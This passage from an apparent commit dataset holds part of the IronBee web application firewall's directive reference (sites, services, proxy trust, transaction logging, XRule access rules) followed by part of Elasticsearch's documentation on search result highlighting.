that was previously\ndeclared by a module.\n| Syntax|`RuleExt`\n| Default|None\n| Context|Site, Location\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nTo load a Lua rule:\n\n-------------------------------------------\nRuleExt lua:\/path\/to\/rule.lua phase:REQUEST\n-------------------------------------------\n\n=== RuleMarker\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a rule marker (placeholder) which will not be executed, but instead should be overridden.\n| Syntax|`RuleMarker id:phase:`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.5\n|===============================================================================\n\nCreates a rule marker (placeholder) which will not be executed, but instead should be\noverridden. The idea is that rule sets can include placeholders for optional custom\nrules which can be overridden, but still allow the rule set writer to maintain execution order.\n\nTo mark and later replace a rule:\n\n-------------------------------------------------------------------------------\nRule ARGS @rx foo id:1 rev:1 phase:REQUEST\n\n# Allow the administrator to set MY_VALUE in another context\nRuleMarker id:2 phase:REQUEST\n\nRule MY_VALUE @gt 0 id:3 rev:1 phase:REQUEST setRequestHeader:X-Foo:%{MY_VALUE}\n\n<Site test>\n Hostname *\n\n Rule &ARGS @gt 5 id:2 phase:REQUEST setvar:MY_VALUE=5\n RuleEnable all\n<\/Site>\n-------------------------------------------------------------------------------\n\nIn the above example, rule id:2 in the main context would be replaced by\nthe rule id:2 in the site context, then the rules would execute id:1,\nid:2 and id:3. If Rule id:2 was not replaced in the site context, then\nrules would execute id:1 then id:3 as id:2 is only a marker\n(placeholder).\n\n=== RuleTrace\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable rule tracing for a rule.\n| Syntax|`RuleTrace <rule-id>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|rules\n| Version|0.9\n|===============================================================================\n\n=== RuleTraceFile\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the rule tracing output file.\n| Syntax|`RuleTraceFile <trace-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|rules\n| Version|0.9\n|===============================================================================\n\n=== SQLiPatternSet\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Create a named libinjection pattern set from a file.\n| Syntax|`SQLiPatternSet <name> <pattern-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|rules\n| Version|0.9\n|===============================================================================\n\nThe pattern file is just a text file with one pattern per line.\n\n=== SensorHostname\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the sensor hostname.\n| Syntax|`SensorHostname <hostname>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThis is just metadata about the sensor which is used in the auditlog.\n\n=== SensorId\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Unique sensor identifier.\n| Syntax|`SensorId <id>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nTODO: Can we make this directive so that, if not defined, we attempt to\ndetect server hostname and use that as ID?\n\n=== SensorName\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Sensor name.\n| Syntax|`SensorName <name>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThis is just metadata about the sensor which is used in the auditlog.\n\n=== Service\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Maps IP and Port to a site.\n| Syntax|`Service <ip>:<port>`\n| Default|`*:*` (any)\n| Context|Site\n|Cardinality|0..n\n| Module|core\n| Version|0.6\n|===============================================================================\n\nThe `Service` directive establishes a mapping between a Site and one or\nIP\/Port pairs. To map hostnames to a Site, see the `Hostname` directive.\n\nIn the simplest case, a site will occupy a single IP\/Port pair:\n\n-----------------------\nService 192.168.32.5:80\n-----------------------\n\nMore often than not, however, several mappings will be used:\n\n------------------------\nService 192.168.32.5:80\nService 192.168.32.6:443\n------------------------\n\nWildcards are permitted for both IP and Port:\n\n----------------------\nService *:80\nService 192.168.32.5:*\n----------------------\n\nTo match any IP address on any Port (which you will need to do in\ndefault sites), use wildcards for both IP and Port, which is the default\nif no `Service` directive is specified for a site:\n\n-----------\nService *:*\n-----------\n\n=== Set\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Set a named configuration parameter.\n| Syntax|`Set <name> <value>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n.Example\n----------------------------------------------\nSet MY_VAR \"some value\"\n----------------------------------------------\n\n=== Site\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Define a site.\n| Syntax|`<Site name>...<\/Site>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|core\n| Version|0.1\n|===============================================================================\n\nA site is one of the main concepts in the configurationin IronBee. The idea\nis to have an element to correspond to real-life web sites. With most web\nsites there is an one-to-one mapping to domain names, but our mapping mechanism\nis quite flexible: you can have one site per domain name, many domain names for\na single site, or even have one domain name shared among several sites.\n\nAt the highest level, a configuration will contain one or more sites.\nFor example:\n\n----------------------------------------\n<Site site1>\n Service *:80\n Hostname site1.example.com\n Hostname site1-alternate.example.com\n<\/Site>\n\n<Site site2>\n Service *:80\n Service 10.0.1.2:443\n Hostname site2.example.com\n<\/Site>\n\n<Site default>\n Service *:*\n Hostname *\n<\/Site>\n----------------------------------------\n\nBefore it can process a transaction, IronBee will examine the current\nconfiguration looking for a site to assign the transaction. Sites are\nprocessed in the configured order where the first matching site is\nchosen. A default site can be specified as the last site using wildcards\nwhen all previous sites fail to match. The `Site` directive only\nestablishes configuration boundaries and assigns a unique handle to each\nsite; the `Service` and `Hostname` directives are responsible for the\nmapping.\n\n=== SiteId\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Unique site identifier.\n| Syntax|`SiteId`\n| Default|None\n| Context|Site\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nTODO: Can we make this directive so that, if not defined, we attempt to\ndetect site hostname and use that as ID?\n\n=== StreamInspect\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a streaming inspection rule, which inspects data as it becomes available, outside rule phases.\n| Syntax|`StreamInspect TARGET @op <param> ...`\n| Context|Site, Location\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nNormally, rules run in one of the available phases, which happen at\nstrategic points in transaction lifecycle. Phase rules are convenient to\nwrite, because all the relevant data is available for inspection.\nHowever, there are situations when it is not possible to have access to\nall of the data in a phase. This is the case, for example, when a\nrequest body is very large, or when buffering is not allowed.\n\nStreaming rules are designed to operate in these circumstances. They are\nable to inspect data as it becomes available, be it a dozen of bytes, or\na single byte.\n\nThe syntax of the `Inspect` directive is similar to that of `Rule`, but\nthere are several restrictions:\n\n* Only one input can be used. This is because streaming rules attach to\na single data source.\n* The `phase` modifier cannot be used, as streaming rules operate\noutside of phases.\n* Only `REQUEST_BODY_STREAM` and `RESPONSE_BODY_STREAM` can be used as\ninputs.\n* Only the `pm`, and `dfa` operators can be used.\n* Transformation functions are not yet supported.\n\n=== TrustedProxyIPs\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify a list of networks or IP address to trust for X-Forwarded-For handling.\n| Syntax|`TrustedProxyIPs <cidr> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|trusted_proxy\n| Version|0.9\n|===============================================================================\n\nThis is a list of IP addresses or CIDR blocks that should be trusted or\nnot trusted when handling the X-Forwarded-For header.\n\nNetworks\/IPs may be prefixed with \"+\" indicate it is trusted or \"-\"\nindicate in are untrusted. If the first entry in the list does not have\na \"+\" or \"-\" the trusted\/untrusted list is cleared and the entry is\ntreated as trusted.\n\nExamples:\n\nTrust only 192.168.1.0\/24:\n\n----------------------------------------\nTrustedProxyIPs 192.168.1.0\/24\n----------------------------------------\n\nTrust all but 10.10.10.10:\n\n--------------------------------------\nTrustedProxyIPs -10.10.10.10\n--------------------------------------\n\n=== TrustedProxyUseXFFHeader\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable the use of X-Forwarded-For header.\n| Syntax|`TrustedProxyUseXFFHeader On\\|Off`\n| Default|`On`\n| Context|Any\n|Cardinality|0..1\n| Module|trusted_proxy\n| Version|0.9\n|===============================================================================\n\nIf enabled the last address listed in the X-Forwarded-For header as the\nremote address. See _TrustedProxyIPs_ to configure the list of trusted\nproxies. The default behaviour is to trust no proxies.\n\n=== TxDump\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Diagnostics directive to dump (log) transaction data for debugging purposes.\n| Syntax|`TxDump`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|devel\n| Version|0.7\n|===============================================================================\n\nThe event field allows indicating _when_ you want the data to be written\nand is one of:\n\n* *TxStarted* - Transaction started.\n* *TxProcess* - Transaction processing (between request and response).\n* *TxContext* - Transaction configuration context chosen.\n* *RequestStart* - Request started.\n* *RequestHeader* - Request headers have been processed.\n* *Request* - Full request has been processed.\n* *ResponseStart* - Response started.\n* *ResponseHeader* - Response headers have been processed.\n* *Response* - Full response has been processed.\n* *TxFinished* - Transaction is finished.\n* *Logging* - Logging phase.\n* *PostProcess* - Post-processing phase.\n\nThe destination field allows specifying _where_ you want to write the\ndata and is one of the following:\n\n* *stderr* - Write to standard error.\n* *stdout* - Write to standard output.\n* *ib* - Write to the IronBee log file.\n* *file:\/\/* - Write to an arbitrary file, optionally appending to the\nfile if the last character is a *+* character.\n\nThe data field is optional and allows specifying _what_ is to be\nwritten. This can be prefixed with a `+` or a `-` character to enable or\ndisable the data.\n\n* *Basic* - Basic TX data.\n* *Context* - Configuration context data.\n* *Connection* - Connection data.\n* *ReqLine* - HTTP request line.\n* *ReqHdr* - HTTP request header.\n* *RspLine* - HTTP response line.\n* *RspHdr* - HTTP response header.\n* *Flags* - Transaction flags.\n* *Args* - Request arguments.\n* *Data* - Transaction data.\n* *Default* - Default is \"Basic ReqLine RspLine\".\n* *Headers* - All HTTP headers.\n* *All* - All data.\n\nExamples:\n\n----------------------------------------------\nTxDump TxContext ib Basic +Context\nTxDump PostProcess file:\/\/\/tmp\/tx.txt All\nTxDump Logging file:\/\/\/var\/log\/ib\/all.txt+ All\nTxDump PostProcess StdOut All\n----------------------------------------------\n\n=== TxLogEnabled\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/Disable the transaction log.\n| Syntax|`TxLogEnabled On \\| Off`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|txlog\n| Version|0.9\n|===============================================================================\n\n=== TxLogIronBeeLog\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable writting the transaction log to the IronBee log.\n| Syntax|`TxLogIronBeeLog`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|txlog\n| Version|0.9\n|===============================================================================\n\n\n=== TxVars\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/Disable additional transaction vars for testing.\n| Syntax|`TxVars On \\| Off`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|txvars\n| Version|0.9\n|===============================================================================\n\nThis will enable additional vars (data fields)::\n* *ENGINE_ID* - Engine ID\n* *SENSOR_ID* - Sensor ID\n* *CONN_ID* - Connection ID\n* *CONN_START* - When the connection started\n* *TX_ID* - Transaction ID\n* *TX_START* - When the transaction started\n* *CONTEXT_NAME* - Name of the selected configuration context\n* *SITE_ID* - Selected site ID\n* *SITE_NAME* - Selected site name\n* *LOCATION_PATH* - Selected location path\n\n=== XRuleGeo\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended geo rule.\n| Syntax|`XRuleGeo`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleGeo is used to setup Geo (country) based rules.\n\nExample:\n--------------------------------------\nXRuleGeo US scaleThreat=0.8 priority=1\n--------------------------------------\n\nFor available actions, see `XRuleIpv4`\n\n=== XRuleIpv4\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended IPv4 rule.\n| Syntax|`XRuleIpv4`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleIpv4 is used to setup IPv4 based rules.\n\nExample:\n-----------------------------------------\nXRuleIpv4 192.168.0.0\/16 block priority=1\n-----------------------------------------\n\nAvailable Actions:\n\n* *priority=N* - Set rule priority.\n* *block* - Block the transaction.\n* *allow* - Allow the transaction.\n* *enableBlockingMode* - Enable blocking mode for this transaction.\n* *disableBlockingMode* - Disable blocking mode for this transaction\n* *scaleThreat=X* - Scale threat calculation (update\n*XRULES:SCALE_THREAT*) by floating point multiplier, X, for this\ntransaction.\n* *enableRequestHeaderInspection* - Enable request header inspection for\nthis transaction.\n* *disableRequestHeaderInspection* - Disable request header inspection\nfor this transaction.\n* *enableRequestURIInspection* - Enable request URI inspection for this\ntransaction.\n* *disableRequestURIInspection* - Disable request URI inspection for\nthis transaction.\n* *enableRequestParamInspection* - Enable request parameter inspection\nfor this transaction.\n* *disableRequestParamInspection* - Disable request parameter inspection\nfor this transaction.\n* *enableRequestBodyInspection* - Enable request body inspection for\nthis transaction.\n* *disableRequestBodyInspection* - Disable request body inspection for\nthis transaction.\n* *enableResponseHeaderInspection* - Enable response header inspection\nfor this transaction.\n* *disableResponseHeaderInspection* - Disable response header inspection\nfor this transaction.\n* *enableResponseBodyInspection* - Enable response body inspection for\nthis transaction.\n* *disableResponseBodyInspection* - Disable response body inspection for\nthis transaction.\n\n=== XRuleIpv6\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended IPv6 rule.\n| Syntax|`XRuleIpv6`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleIpv6 is used to setup IPv6 based rules.\n\nExample:\n----------------------------------\nXRuleIpv6 ::1\/128 block priority=1\n----------------------------------\n\nFor available actions, see `XRuleIpv4`\n\n=== XRulePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended path rule.\n| Syntax|`XRulePath`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRulePath is used to setup URI path based rules.\n\nExample:\n--------------------------------------------------------------\nXRulePath \/admin scaleThreat=1.5 enableBlockingMode priority=1\n--------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`\n\n=== XRuleRequestContentType\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended request content type rule.\n| Syntax|`XRuleRequestContentType`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleRequestContentType is used to setup request contetnt type based\nrules.\n\nExample:\n-------------------------------------------------------------------------------------\nXRuleRequestContentType application\/x-www-form-urlencoded enableRequestBodyInspection\n-------------------------------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`\n\n=== XRuleResponseContentType\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended IPv6 rule.\n| Syntax|`XRuleResponseContentType`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleResponseContentType is used to setup response content type based\nrules.\n\nExample:\n----------------------------------------------------------------\nXRuleResponseContentType image\/png disableResponseBodyInspection\n----------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`\n\n=== XRuleTime\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended time rule.\n| Syntax|`XRuleTime`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleTime is used to setup date\/time based rules.\n\nThe time-spec is in the format: `[!]DOW(,DOW)*@HH:MM-HH:MM[-|+]ZZZZ`:\n\n* *!* - Invert rule.\n* *DOW* - Day of Week (0=Sunday - 6=Saturday).\n* *HH* - Two digit hour (24-hr format).\n* *MM* - Two digit minute.\n* *[-|+]ZZZZ* - Timezone offset from GMT\n\nExample:\n------------------------------------------------------------------------\nXRuleTime !1,2,3,4,5@08:00-17:00-0500 scaleThreat=1.5 enableBlockingMode\n------------------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb1694a18ee6f6885587361193936d8ed008ca36","subject":"Docs: Added IDs to the highlighters for linking","message":"Docs: Added IDs to the highlighters for linking\n","repos":"aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch","old_file":"docs\/reference\/search\/request\/highlighting.asciidoc","new_file":"docs\/reference\/search\/request\/highlighting.asciidoc","new_contents":"[[search-request-highlighting]]\n=== Highlighting\n\nAllows to highlight search results on one or more fields. The\nimplementation uses either the lucene `highlighter`, `fast-vector-highlighter`\nor `postings-highlighter`. The following is an example of the search request\nbody:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {}\n }\n }\n}\n--------------------------------------------------\n\nIn the above case, the `content` field will be highlighted for each\nsearch hit (there will be another element in each search hit, called\n`highlight`, which includes the highlighted fields and the highlighted\nfragments).\n\nIn order to perform highlighting, the actual content of the field is\nrequired. If the field in question is stored (has `store` set to `true`\nin the mapping) it will be used, otherwise, the actual `_source` will\nbe loaded and the relevant field will be extracted from it.\n\nThe field name supports wildcard notation. For example, using `comment_*`\nwill cause all fields that match the expression to be highlighted.\n\n[[postings-highlighter]]\n==== Postings highlighter\n\nIf `index_options` is set to `offsets` in the mapping the postings highlighter\nwill be used instead of the plain highlighter. The postings highlighter:\n\n* Is faster since it doesn't require to reanalyze the text to be highlighted:\nthe larger the documents the better the performance gain should be\n* Requires less disk space than term_vectors, needed for the fast vector\nhighlighter\n* Breaks the text into sentences and highlights them. Plays really well with\nnatural languages, not as well with fields containing for instance html markup\n* Treats the document as the whole corpus, and scores individual sentences as\nif they were documents in this corpus, using the BM25 algorithm\n\nHere is an example of setting the `content` field to allow for\nhighlighting using the postings highlighter on it:\n\n[source,js]\n--------------------------------------------------\n{\n \"type_name\" : {\n \"content\" : {\"index_options\" : \"offsets\"}\n }\n}\n--------------------------------------------------\n\n[NOTE]\nNote that the postings highlighter is meant to perform simple query terms\nhighlighting, regardless of their positions. That means that when used for\ninstance in combination with a phrase query, it will highlight all the terms\nthat the query is composed of, regardless of whether they are actually part of\na query match, effectively ignoring their positions.\n\n[WARNING]\nThe postings highlighter does support highlighting of multi term queries, like\nprefix queries, wildcard queries and so on. On the other hand, this requires\nthe queries to be rewritten using a proper\n<<query-dsl-multi-term-rewrite,rewrite method>> that supports multi term\nextraction, which is a potentially expensive operation.\n\n[[fast-vector-highlighter]]\n==== Fast vector highlighter\n\nIf `term_vector` information is provided by setting `term_vector` to\n`with_positions_offsets` in the mapping then the fast vector highlighter\nwill be used instead of the plain highlighter. The fast vector highlighter:\n\n* Is faster especially for large fields (> `1MB`)\n* Can be customized with `boundary_chars`, `boundary_max_scan`, and\n `fragment_offset` (see <<boundary-characters,below>>)\n* Requires setting `term_vector` to `with_positions_offsets` which\n increases the size of the index\n* Can combine matches from multiple fields into one result. See\n `matched_fields`\n* Can assign different weights to matches at different positions allowing\n for things like phrase matches being sorted above term matches when\n highlighting a Boosting Query that boosts phrase matches over term matches\n\nHere is an example of setting the `content` field to allow for\nhighlighting using the fast vector highlighter on it (this will cause\nthe index to be bigger):\n\n[source,js]\n--------------------------------------------------\n{\n \"type_name\" : {\n \"content\" : {\"term_vector\" : \"with_positions_offsets\"}\n }\n}\n--------------------------------------------------\n\n==== Force highlighter type\n\nThe `type` field allows to force a specific highlighter type. This is useful\nfor instance when needing to use the plain highlighter on a field that has\n`term_vectors` enabled. The allowed values are: `plain`, `postings` and `fvh`.\nThe following is an example that forces the use of the plain highlighter:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {\"type\" : \"plain\"}\n }\n }\n}\n--------------------------------------------------\n\n==== Force highlighting on source\n\nadded[1.0.0.RC1]\n\nForces the highlighting to highlight fields based on the source even if fields are\nstored separately. Defaults to `false`.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {\"force_source\" : true}\n }\n }\n}\n--------------------------------------------------\n\n[[tags]]\n==== Highlighting Tags\n\nBy default, the highlighting will wrap highlighted text in `<em>` and\n`<\/em>`. This can be controlled by setting `pre_tags` and `post_tags`,\nfor example:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"pre_tags\" : [\"<tag1>\"],\n \"post_tags\" : [\"<\/tag1>\"],\n \"fields\" : {\n \"_all\" : {}\n }\n }\n}\n--------------------------------------------------\n\nUsing the fast vector highlighter there can be more tags, and the \"importance\"\nis ordered.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"pre_tags\" : [\"<tag1>\", \"<tag2>\"],\n \"post_tags\" : [\"<\/tag1>\", \"<\/tag2>\"],\n \"fields\" : {\n \"_all\" : {}\n }\n }\n}\n--------------------------------------------------\n\nThere are also built in \"tag\" schemas, with currently a single schema\ncalled `styled` with the following `pre_tags`:\n\n[source,js]\n--------------------------------------------------\n<em class=\"hlt1\">, <em class=\"hlt2\">, <em class=\"hlt3\">,\n<em class=\"hlt4\">, <em class=\"hlt5\">, <em class=\"hlt6\">,\n<em class=\"hlt7\">, <em class=\"hlt8\">, <em class=\"hlt9\">,\n<em class=\"hlt10\">\n--------------------------------------------------\n\nand `<\/em>` as `post_tags`. If you think of more nice to have built in tag\nschemas, just send an email to the mailing list or open an issue. Here\nis an example of switching tag schemas:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"tags_schema\" : \"styled\",\n \"fields\" : {\n \"content\" : {}\n }\n }\n}\n--------------------------------------------------\n\n\n==== Encoder\n\nAn `encoder` parameter can be used to define how highlighted text will\nbe encoded. It can be either `default` (no encoding) or `html` (will\nescape html, if you use html highlighting tags).\n\n==== Highlighted Fragments\n\nEach field highlighted can control the size of the highlighted fragment\nin characters (defaults to `100`), and the maximum number of fragments\nto return (defaults to `5`).\nFor example:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {\"fragment_size\" : 150, \"number_of_fragments\" : 3}\n }\n }\n}\n--------------------------------------------------\n\nThe `fragment_size` is ignored when using the postings highlighter, as it\noutputs sentences regardless of their length.\n\nOn top of this it is possible to specify that highlighted fragments need\nto be sorted by score:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"order\" : \"score\",\n \"fields\" : {\n \"content\" : {\"fragment_size\" : 150, \"number_of_fragments\" : 3}\n }\n }\n}\n--------------------------------------------------\n\nIf the `number_of_fragments` value is set to `0` then no fragments are\nproduced, instead the whole content of the field is returned, and of\ncourse it is highlighted. This can be very handy if short texts (like\ndocument title or address) need to be highlighted but no fragmentation\nis required. Note that `fragment_size` is ignored in this case.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"_all\" : {},\n \"bio.title\" : {\"number_of_fragments\" : 0}\n }\n }\n}\n--------------------------------------------------\n\nWhen using `fast-vector-highlighter` one can use `fragment_offset`\nparameter to control the margin to start highlighting from.\n\nIn the case where there is no matching fragment to highlight, the default is\nto not return anything. Instead, we can return a snippet of text from the\nbeginning of the field by setting `no_match_size` (default `0`) to the length\nof the text that you want returned. The actual length may be shorter than\nspecified as it tries to break on a word boundary. When using the postings\nhighlighter it is not possible to control the actual size of the snippet,\ntherefore the first sentence gets returned whenever `no_match_size` is\ngreater than `0`.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"fields\" : {\n \"content\" : {\n \"fragment_size\" : 150,\n \"number_of_fragments\" : 3,\n \"no_match_size\": 150\n }\n }\n }\n}\n--------------------------------------------------\n\n\n==== Highlight query\n\nIt is also possible to highlight against a query other than the search\nquery by setting `highlight_query`. This is especially useful if you\nuse a rescore query because those are not taken into account by\nhighlighting by default. Elasticsearch does not validate that\n`highlight_query` contains the search query in any way so it is possible\nto define it so legitimate query results aren't highlighted at all.\nGenerally it is better to include the search query in the\n`highlight_query`. Here is an example of including both the search\nquery and the rescore query in `highlight_query`.\n[source,js]\n--------------------------------------------------\n{\n \"fields\": [ \"_id\" ],\n \"query\" : {\n \"match\": {\n \"content\": {\n \"query\": \"foo bar\"\n }\n }\n },\n \"rescore\": {\n \"window_size\": 50,\n \"query\": {\n \"rescore_query\" : {\n \"match_phrase\": {\n \"content\": {\n \"query\": \"foo bar\",\n \"phrase_slop\": 1\n }\n }\n },\n \"rescore_query_weight\" : 10\n }\n },\n \"highlight\" : {\n \"order\" : \"score\",\n \"fields\" : {\n \"content\" : {\n \"fragment_size\" : 150,\n \"number_of_fragments\" : 3,\n \"highlight_query\": {\n \"bool\": {\n \"must\": {\n \"match\": {\n \"content\": {\n \"query\": \"foo bar\"\n }\n }\n },\n \"should\": {\n \"match_phrase\": {\n \"content\": {\n \"query\": \"foo bar\",\n \"phrase_slop\": 1,\n \"boost\": 10.0\n }\n }\n },\n \"minimum_should_match\": 0\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nNote that the score of text fragment in this case is calculated by the Lucene\nhighlighting framework. For implementation details you can check the\n`ScoreOrderFragmentsBuilder.java` class. On the other hand when using the\npostings highlighter the fragments are scored using, as mentioned above,\nthe BM25 algorithm.\n\n[[highlighting-settings]]\n==== Global Settings\n\nHighlighting settings can be set on a global level and then overridden\nat the field level.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"number_of_fragments\" : 3,\n \"fragment_size\" : 150,\n \"tag_schema\" : \"styled\",\n \"fields\" : {\n \"_all\" : { \"pre_tags\" : [\"<em>\"], \"post_tags\" : [\"<\/em>\"] },\n \"bio.title\" : { \"number_of_fragments\" : 0 },\n \"bio.author\" : { \"number_of_fragments\" : 0 },\n \"bio.content\" : { \"number_of_fragments\" : 5, \"order\" : \"score\" }\n }\n }\n}\n--------------------------------------------------\n\n[[field-match]]\n==== Require Field Match\n\n`require_field_match` can be set to `true` which will cause a field to\nbe highlighted only if a query matched that field. `false` means that\nterms are highlighted on all requested fields regardless if the query\nmatches specifically on them.\n\n[[boundary-characters]]\n==== Boundary Characters\n\nWhen highlighting a field using the fast vector highlighter,\n`boundary_chars` can be configured to define what constitutes a boundary\nfor highlighting. It's a single string with each boundary character\ndefined in it. It defaults to `.,!? \\t\\n`.\n\nThe `boundary_max_scan` allows to control how far to look for boundary\ncharacters, and defaults to `20`.\n\n\n[[matched-fields]]\n==== Matched Fields\nThe Fast Vector Highlighter can combine matches on multiple fields to\nhighlight a single field using `matched_fields`. This is most\nintuitive for multifields that analyze the same string in different\nways. All `matched_fields` must have `term_vector` set to\n`with_positions_offsets` but only the field to which the matches are\ncombined is loaded so only that field would benefit from having\n`store` set to `yes`.\n\nIn the following examples `content` is analyzed by the `english`\nanalyzer and `content.plain` is analyzed by the `standard` analyzer.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\": {\n \"query_string\": {\n \"query\": \"content.plain:running scissors\",\n \"fields\": [\"content\"]\n }\n },\n \"highlight\": {\n \"order\": \"score\",\n \"fields\": {\n \"content\": {\n \"matched_fields\": [\"content\", \"content.plain\"],\n \"type\" : \"fvh\"\n }\n }\n }\n}\n--------------------------------------------------\nThe above matches both \"run with scissors\" and \"running with scissors\"\nand would highlight \"running\" and \"scissors\" but not \"run\". If both\nphrases appear in a large document then \"running with scissors\" is\nsorted above \"run with 